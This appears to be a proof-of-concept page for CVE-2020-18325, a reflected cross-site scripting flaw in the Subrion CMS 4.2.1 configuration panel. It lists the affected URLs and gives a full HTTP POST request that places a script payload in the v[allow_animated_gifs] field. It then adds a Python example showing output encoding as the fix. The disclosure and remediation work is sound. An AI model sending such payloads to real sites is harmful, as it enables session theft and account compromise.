
CVE-2020-18325 PoC — Subrion CMS Cross-Site Scripting Vulnerability

Source
Associated Vulnerability
Title: Subrion CMS Cross-Site Scripting Vulnerability (CVE-2020-18325)
Description: Subrion CMS is a PHP-based content management system (CMS) from the Subrion team. It can be integrated into websites and supports a variety of extensions and plugins. A security vulnerability exists in Subrion CMS 4.2.1 that allows an attacker to mount an attack through the configuration panel.
Description
Exploit PoC for CVE-2020-18325
Readme

# Multiple Cross-Site Scripting (XSS) vulnerabilities exist in the Configuration panel of Intelliants Subrion CMS v4.2.1
# Description
Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry-level, mid-sized or large sites.

Multiple reflected cross-site scripting vulnerabilities were discovered in the Subrion CMS v4.2.1 configuration panel, allowing a remote attacker to inject arbitrary JavaScript.

**Date**: 27-02-2022 \
**Software Link:** https://subrion.org \
**Exploit Author**: HaMM0nz \
**CVE**: CVE-2020-18325 \
**Category:** Web Application \
**Affected URLs**
- /panel/configuration/pictures/
- /panel/configuration/mail/
- /panel/configuration/miscellaneous/
- /panel/menus/add/
# Proof of Concept
The final multipart part of the request below carries the XSS payload in the `v[allow_animated_gifs]` field.

```http
POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/
Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623
Content-Length: 5605
Connection: close
Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded
Upgrade-Insecure-Requests: 1

-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"

t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"

75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"

0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"

test"><script>alert(1)</script>1qazx
```

# Timeline
**Discovery and report** : 24 June 2019 \
**CVE ID was assigned** : 11 Aug 2021 \
**Public** : 27 February 2022
# Solution
Consider complying with OWASP's XSS prevention guidelines (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).
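To make the Solution concrete, the following is an added example written for this page (it is not Subrion's code and does not reproduce its templates): the payload from the PoC request above is reflected into a hypothetical configuration-panel `<input>`, once interpolated raw (the vulnerable pattern) and once with the HTML-attribute output encoding the OWASP cheat sheet prescribes. The template string, the `render_*` helpers and the `breaks_out_of_attribute` check are assumptions made for the illustration.

```python
import html
import re

# Constructed sample: the value the PoC request submits in the multipart
# field v[allow_animated_gifs] (taken from the README above).
POC_VALUE = 'test"><script>alert(1)</script>1qazx'

# Hypothetical markup for a configuration-panel setting. It stands in for
# whatever the CMS really emits and is not Subrion's template.
TEMPLATE = '<input type="text" name="v[{key}]" value="{value}">'


def render_unsafe(key: str, value: str) -> str:
    """Vulnerable pattern: the reflected value is interpolated verbatim, so a
    double quote closes the attribute and the rest lands in element context."""
    return TEMPLATE.format(key=key, value=value)


def render_safe(key: str, value: str) -> str:
    """Hardened pattern: entity-encode the value for a quoted attribute.

    html.escape(quote=True) rewrites & < > " and ', which is what a value inside
    a double-quoted HTML attribute needs (OWASP XSS prevention, HTML attribute
    encoding rule)."""
    return TEMPLATE.format(key=key, value=html.escape(value, quote=True))


def attr_encode(value: str) -> str:
    """Stricter OWASP-style attribute encoding: every character outside
    [A-Za-z0-9] becomes a hex entity, so the result is safe even in an
    unquoted attribute. html.unescape() reverses it exactly."""
    return "".join(
        ch if (ch.isascii() and ch.isalnum()) else f"&#x{ord(ch):02X};"
        for ch in value
    )


_SCRIPT_OPEN = re.compile(r"<\s*script\b", re.IGNORECASE)


def breaks_out_of_attribute(markup: str) -> bool:
    """True when rendered markup contains a literal <script> opener, i.e. the
    submitted value escaped the attribute and became part of the document."""
    return _SCRIPT_OPEN.search(markup) is not None


def roundtrips(value: str) -> bool:
    """Encoding must be lossless: the browser decodes entities back to the
    original setting value, so legitimate data is not mangled."""
    return html.unescape(attr_encode(value)) == value


if __name__ == "__main__":
    key = "allow_animated_gifs"
    for label, renderer in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = renderer(key, POC_VALUE)
        print(f"{label:6s} executes script: {breaks_out_of_attribute(out)}")
        print("       ", out)
```

Running the module prints the two renderings side by side: the raw one contains a live `<script>` element, the encoded one keeps the whole payload inside the `value` attribute as inert text. The same encode-at-output rule applies to every field the panel echoes back, not only the one the PoC exercises.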
File Snapshot

[4.0K] /data/pocs/813745c31bf0d20db929cd7197ec3dcc7fe22594
└── [2.5K] README.md

0 directories, 1 file